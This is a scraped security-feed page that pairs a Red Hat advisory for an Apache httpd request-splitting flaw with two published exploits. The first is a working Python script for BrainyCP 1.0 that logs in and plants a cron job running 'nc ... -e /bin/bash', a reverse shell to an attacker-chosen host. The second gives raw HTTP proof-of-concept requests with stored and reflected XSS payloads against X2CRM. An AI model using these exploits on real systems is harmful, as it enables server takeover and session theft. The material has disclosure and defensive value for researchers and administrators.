/8JZ8pkHelA+x35XpPrvABYiNfnqDd3GZqrKOhBpOME50LsOAy2FsoAu7YVZEpSe  
7NwDzA302hATDoHAcUqMi5FV+RyYb8/IY/MkcUHSK6WbjMB/DOQi9XxSeZYlIyau  
nOUts4A2gb6Bilm2c2lxGOKWbgDidjpTvmV5QPg+IZ5675kVRvjXdKpOOZ0HCsv+  
8IR0DdEmZK29611A/+DebXUYbIvzFJBCjkKiDsy634LxZ8DyaUiUmsxZxFTWZmJT  
xvxZiSM7PD1bEH+v1SZDk8GNIakqyJxd45S6/EPf3d0uOpFGio/7RJIv9HLU5PbG  
uDk9WJdKS7G0Pdy3AV71EY28JW00xe8LlFvIDOlYOYmVNImzylWZcfgn2Lrmrk30  
uFaWXx6chVsWD+j82b8isJsPR/+PAhrv9cGR0iNUoE928eLr84cNI1oCkgG0EvE/  
7DIYuorMOu0RL0emENBlWxjDney9vo7ZbzqcOSREGfBbugGjrYIvKe8OMUvS4fCz  
MKRmeg7jyqg7vlPg4EsrWRJ06F2EMcH/WMqdWoE+FOiZaibih9QY4GoyhOLo938l  
Ywg32HbPRgAMvNEt0gV58xIVfu5Edh249+61F+F4ADLt8VKwoZGhbUyaAQoqUlU9  
mZUEFPgIzvI=  
=ApGa  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1549-01

Red Hat Security Advisory 2023-1670-01 - The httpd packages provide the Apache HTTP Server, a powerful, efficient, and extensible web server.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: httpd and mod_http2 security update  
Advisory ID:       RHSA-2023:1670-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1670  
Issue date:        2023-04-06  
CVE Names:         CVE-2023-25690   
=====================================================================

1. Summary:

An update for httpd and mod_http2 is now available for Red Hat Enterprise  
Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 9) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

The httpd packages provide the Apache HTTP Server, a powerful, efficient,  
and extensible web server.

Security Fix(es):

* httpd: HTTP request splitting with mod_rewrite and mod_proxy  
(CVE-2023-25690)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the updated packages, the httpd daemon will be restarted  
automatically.

5. Bugs fixed (https://bugzilla.redhat.com/):

2176209 - CVE-2023-25690 httpd: HTTP request splitting with mod_rewrite and mod_proxy

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

Source:  
httpd-2.4.53-7.el9_1.5.src.rpm  
mod_http2-1.15.19-3.el9_1.5.src.rpm

aarch64:  
httpd-2.4.53-7.el9_1.5.aarch64.rpm  
httpd-core-2.4.53-7.el9_1.5.aarch64.rpm  
httpd-core-debuginfo-2.4.53-7.el9_1.5.aarch64.rpm  
httpd-debuginfo-2.4.53-7.el9_1.5.aarch64.rpm  
httpd-debugsource-2.4.53-7.el9_1.5.aarch64.rpm  
httpd-devel-2.4.53-7.el9_1.5.aarch64.rpm  
httpd-tools-2.4.53-7.el9_1.5.aarch64.rpm  
httpd-tools-debuginfo-2.4.53-7.el9_1.5.aarch64.rpm  
mod_http2-1.15.19-3.el9_1.5.aarch64.rpm  
mod_http2-debuginfo-1.15.19-3.el9_1.5.aarch64.rpm  
mod_http2-debugsource-1.15.19-3.el9_1.5.aarch64.rpm  
mod_ldap-2.4.53-7.el9_1.5.aarch64.rpm  
mod_ldap-debuginfo-2.4.53-7.el9_1.5.aarch64.rpm  
mod_lua-2.4.53-7.el9_1.5.aarch64.rpm  
mod_lua-debuginfo-2.4.53-7.el9_1.5.aarch64.rpm  
mod_proxy_html-2.4.53-7.el9_1.5.aarch64.rpm  
mod_proxy_html-debuginfo-2.4.53-7.el9_1.5.aarch64.rpm  
mod_session-2.4.53-7.el9_1.5.aarch64.rpm  
mod_session-debuginfo-2.4.53-7.el9_1.5.aarch64.rpm  
mod_ssl-2.4.53-7.el9_1.5.aarch64.rpm  
mod_ssl-debuginfo-2.4.53-7.el9_1.5.aarch64.rpm

noarch:  
httpd-filesystem-2.4.53-7.el9_1.5.noarch.rpm  
httpd-manual-2.4.53-7.el9_1.5.noarch.rpm

ppc64le:  
httpd-2.4.53-7.el9_1.5.ppc64le.rpm  
httpd-core-2.4.53-7.el9_1.5.ppc64le.rpm  
httpd-core-debuginfo-2.4.53-7.el9_1.5.ppc64le.rpm  
httpd-debuginfo-2.4.53-7.el9_1.5.ppc64le.rpm  
httpd-debugsource-2.4.53-7.el9_1.5.ppc64le.rpm  
httpd-devel-2.4.53-7.el9_1.5.ppc64le.rpm  
httpd-tools-2.4.53-7.el9_1.5.ppc64le.rpm  
httpd-tools-debuginfo-2.4.53-7.el9_1.5.ppc64le.rpm  
mod_http2-1.15.19-3.el9_1.5.ppc64le.rpm  
mod_http2-debuginfo-1.15.19-3.el9_1.5.ppc64le.rpm  
mod_http2-debugsource-1.15.19-3.el9_1.5.ppc64le.rpm  
mod_ldap-2.4.53-7.el9_1.5.ppc64le.rpm  
mod_ldap-debuginfo-2.4.53-7.el9_1.5.ppc64le.rpm  
mod_lua-2.4.53-7.el9_1.5.ppc64le.rpm  
mod_lua-debuginfo-2.4.53-7.el9_1.5.ppc64le.rpm  
mod_proxy_html-2.4.53-7.el9_1.5.ppc64le.rpm  
mod_proxy_html-debuginfo-2.4.53-7.el9_1.5.ppc64le.rpm  
mod_session-2.4.53-7.el9_1.5.ppc64le.rpm  
mod_session-debuginfo-2.4.53-7.el9_1.5.ppc64le.rpm  
mod_ssl-2.4.53-7.el9_1.5.ppc64le.rpm  
mod_ssl-debuginfo-2.4.53-7.el9_1.5.ppc64le.rpm

s390x:  
httpd-2.4.53-7.el9_1.5.s390x.rpm  
httpd-core-2.4.53-7.el9_1.5.s390x.rpm  
httpd-core-debuginfo-2.4.53-7.el9_1.5.s390x.rpm  
httpd-debuginfo-2.4.53-7.el9_1.5.s390x.rpm  
httpd-debugsource-2.4.53-7.el9_1.5.s390x.rpm  
httpd-devel-2.4.53-7.el9_1.5.s390x.rpm  
httpd-tools-2.4.53-7.el9_1.5.s390x.rpm  
httpd-tools-debuginfo-2.4.53-7.el9_1.5.s390x.rpm  
mod_http2-1.15.19-3.el9_1.5.s390x.rpm  
mod_http2-debuginfo-1.15.19-3.el9_1.5.s390x.rpm  
mod_http2-debugsource-1.15.19-3.el9_1.5.s390x.rpm  
mod_ldap-2.4.53-7.el9_1.5.s390x.rpm  
mod_ldap-debuginfo-2.4.53-7.el9_1.5.s390x.rpm  
mod_lua-2.4.53-7.el9_1.5.s390x.rpm  
mod_lua-debuginfo-2.4.53-7.el9_1.5.s390x.rpm  
mod_proxy_html-2.4.53-7.el9_1.5.s390x.rpm  
mod_proxy_html-debuginfo-2.4.53-7.el9_1.5.s390x.rpm  
mod_session-2.4.53-7.el9_1.5.s390x.rpm  
mod_session-debuginfo-2.4.53-7.el9_1.5.s390x.rpm  
mod_ssl-2.4.53-7.el9_1.5.s390x.rpm  
mod_ssl-debuginfo-2.4.53-7.el9_1.5.s390x.rpm

x86_64:  
httpd-2.4.53-7.el9_1.5.x86_64.rpm  
httpd-core-2.4.53-7.el9_1.5.x86_64.rpm  
httpd-core-debuginfo-2.4.53-7.el9_1.5.x86_64.rpm  
httpd-debuginfo-2.4.53-7.el9_1.5.x86_64.rpm  
httpd-debugsource-2.4.53-7.el9_1.5.x86_64.rpm  
httpd-devel-2.4.53-7.el9_1.5.x86_64.rpm  
httpd-tools-2.4.53-7.el9_1.5.x86_64.rpm  
httpd-tools-debuginfo-2.4.53-7.el9_1.5.x86_64.rpm  
mod_http2-1.15.19-3.el9_1.5.x86_64.rpm  
mod_http2-debuginfo-1.15.19-3.el9_1.5.x86_64.rpm  
mod_http2-debugsource-1.15.19-3.el9_1.5.x86_64.rpm  
mod_ldap-2.4.53-7.el9_1.5.x86_64.rpm  
mod_ldap-debuginfo-2.4.53-7.el9_1.5.x86_64.rpm  
mod_lua-2.4.53-7.el9_1.5.x86_64.rpm  
mod_lua-debuginfo-2.4.53-7.el9_1.5.x86_64.rpm  
mod_proxy_html-2.4.53-7.el9_1.5.x86_64.rpm  
mod_proxy_html-debuginfo-2.4.53-7.el9_1.5.x86_64.rpm  
mod_session-2.4.53-7.el9_1.5.x86_64.rpm  
mod_session-debuginfo-2.4.53-7.el9_1.5.x86_64.rpm  
mod_ssl-2.4.53-7.el9_1.5.x86_64.rpm  
mod_ssl-debuginfo-2.4.53-7.el9_1.5.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-25690  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZDBH29zjgjWX9erEAQhFpw/9HSLo3H9yk8KOpnyrtD9alhqGMI4Uvw1O  
a6fRfNs6bD0ru8xdVJDjpXGOKTOgMW6p/zr789oAurWoEFr78mxPF68aliHjIA2v  
nvUNQtnvQmrGcVIWqbd0ANxBn9RMTnq7UoHLIkrbOwvpaKeb3cDPjry75qcjMaY0  
59wDL+dAUg00uZnQTSMr31wT+LxyKOKwRQqGF5Jyrd8Hcctwg2K01fcHh6Cu15Hn  
TDKGj2hdOXYqkaO09UxxwAh2GzZiJLA/oxp+RnbZzmKkgoezS7CBLLkVjJBRwf3r  
uyFFgSZqntzx2oXoOGMqiMSwFcN9c9f0Ga2i8/BBMAYeNNGHyTIp/tXGUBjZDgdc  
Ti8EA0MijRynkwAhEdXDO0u42iA9aGNsDy0ny0CykaGwi4RRu1dJRAM7z3oXkrnm  
dl3ZSjqA0jWGkP0419sPaLubmLXz0gYsayFSu9HwuvaDwxF6hn7wGAhVVTq5thQJ  
NyOGWCNEvVq5M7er4aYlU4blz/iQOSlDWUjMLjGKZJ70K7yuVpFzg0Hol/EOAfqZ  
DvgYTVBOJ0SIoEgdG6emyuSWqZ7pGfDPEE+Yo3YUKWMXKBR6Gw+eIUs6mwX7GGG1  
LtSP/q1u8dyPcXB1V+3D7Hgc/6vxR/ZXoWOrrdA6LaRVPAA4nupO7NpqImNz0sa2  
z+8/qJuTlfY=  
=zwk7  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1670-01

BrainyCP version 1.0 suffers from a remote code execution vulnerability.

    # Exploit Title: BrainyCP V1.0 - Remote Code Execution# Date: 2023-04-03# Exploit Author: Ahmet Ümit BAYRAM# Vendor Homepage: https://brainycp.io# Demo: https://demo.brainycp.io# Tested on: Kali Linux# CVE : N/Aimport requests# credentialsurl = input("URL: ")username = input("Username: ")password = input("Password: ")ip = input("IP: ")port = input("Port: ")# login session = requests.Session()login_url = f"{url}/auth.php"login_data = {"login": username, "password": password, "lan": "/"}response = session.post(login_url, data=login_data)if "Sign In" in response.text:    print("[-] Wrong credentials or may the system patched.")    exit()# reverse shell reverse_shell = f"nc {ip} {port} -e /bin/bash"# requestadd_cron_url = f"{url}/index.php?do=crontab&subdo=ajax&subaction=addcron"add_cron_data = {    "cron_freq_minutes": "*",    "cron_freq_minutes_own": "",    "cron_freq_hours": "*",    "cron_freq_hours_own": "",    "cron_freq_days": "*",    "cron_freq_days_own": "",    "cron_freq_months": "*",    "cron_freq_weekdays": "*",    "cron_command": reverse_shell,    "cron_user": username,}response = session.post(add_cron_url, data=add_cron_data)print("[+] Check your listener!")

BrainyCP 1.0 Remote Code Execution

X2CRM versions 6.6 and 6.9 suffer from multiple cross site scripting vulnerabilities.

    # Exploit Title: X2CRM v6.6/6.9 - Stored Cross-Site Scripting (XSS) (Authenticated)# Exploit Author: Betul Denizler# Vendor Homepage: https://x2crm.com/# Software Link: https://sourceforge.net/projects/x2engine/# Version: X2CRM v6.6/6.9# Tested on: Ubuntu Mate 20.04# Vulnerable Parameter: Actions[subject]# CVE: CVE-2022-48178# Date: 27.12.2022'''POC REQUEST:========POST /c2xrm/x2engine/index.php/actions/update?id=1 HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 172Origin: http://localhostConnection: closeReferer: http://localhost/c2xrm/x2engine/index.php/actions/viewAction?id=1Cookie: LoginForm[username]=admin; LoginForm[rememberMe]=1; PHPSESSID=kg3n7kcjqtm29fc7n4m72m0bt5; YII_CSRF_TOKEN=e5d14327e116fe92a5feb663d52e0920f1a4adab; 5d8630d289284e8c14d15b14f4b4dc28=779a63cb39d04cca59b4a3b9b2a4fad817930211a%3A4%3A%7Bi%3A0%3Bs%3A1%3A%224%22%3Bi%3A1%3Bs%3A5%3A%22test2%22%3Bi%3A2%3Bi%3A2592000%3Bi%3A3%3Ba%3A0%3A%7B%7D%7D; d9ee490d05f512911c1c4614c37db2b8=15982c76efa545e0e6fcd167baa86541c1ef91eda%3A4%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3Bi%3A1%3Bs%3A5%3A%22admin%22%3Bi%3A2%3Bi%3A2592000%3Bi%3A3%3Ba%3A0%3A%7B%7D%7D; sessionToken=Ncr7UIvK2yPvHzZc8koNW4DaIXxwZnsrSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originYII_CSRF_TOKEN=e5d14327e116fe92a5feb663d52e0920f1a4adab&Actions%5Bsubject%5D=%3Cscript%3Ealert(1)%3C%2Fscript%3E&Actions%5Bpriority%5D=1&Actions%5BactionDescription%5D=testEXPLOITATION========1. Create an action2. Inject payload to the vulnerable parameter in POST requestPayload: %3Cscript%3Ealert(1)%3C%2Fscript%3E'''# Exploit Title: X2CRM v6.6/6.9 - Reflected Cross-Site Scripting (XSS) (Authenticated)# Exploit Author: Betul Denizler# Vendor Homepage: https://x2crm.com/# Software Link: https://sourceforge.net/projects/x2engine/# Version: X2CRM v6.6/6.9# Tested on: Ubuntu Mate 20.04# Vulnerable Parameter: model# CVE: Use CVE-2022-48177# Date: 27.12.2022'''POC REQUEST:========GET /x2crm/x2engine/index.php/admin/importModels?model=asd%22%3E%3Cbody%20onload=%22alert(4)%22%3E HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeCookie: LoginForm[username]=admin; LoginForm[rememberMe]=1; PHPSESSID=959fpkms4abdhtresce9k9rmk3; YII_CSRF_TOKEN=e5d14327e116fe92a5feb663d52e0920f1a4adab; d9ee490d05f512911c1c4614c37db2b8=15982c76efa545e0e6fcd167baa86541c1ef91eda%3A4%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3Bi%3A1%3Bs%3A5%3A%22admin%22%3Bi%3A2%3Bi%3A2592000%3Bi%3A3%3Ba%3A0%3A%7B%7D%7D; locationTrackingFrequency=60; locationTrackingSwitch=1; 5d8630d289284e8c14d15b14f4b4dc28=15982c76efa545e0e6fcd167baa86541c1ef91eda%3A4%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3Bi%3A1%3Bs%3A5%3A%22admin%22%3Bi%3A2%3Bi%3A2592000%3Bi%3A3%3Ba%3A0%3A%7B%7D%7D; sessionToken=FFWkdliSAKgtUbP1dKP4iswyYRelqyQ4Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: noneSec-Fetch-User: ?1EXPLOITATION========1. Select Import Records Model in admin settings2. Inject payload to the vulnerable parameter in GET requestPayload: "><body onload="alert(4)">'''

Tag

#linux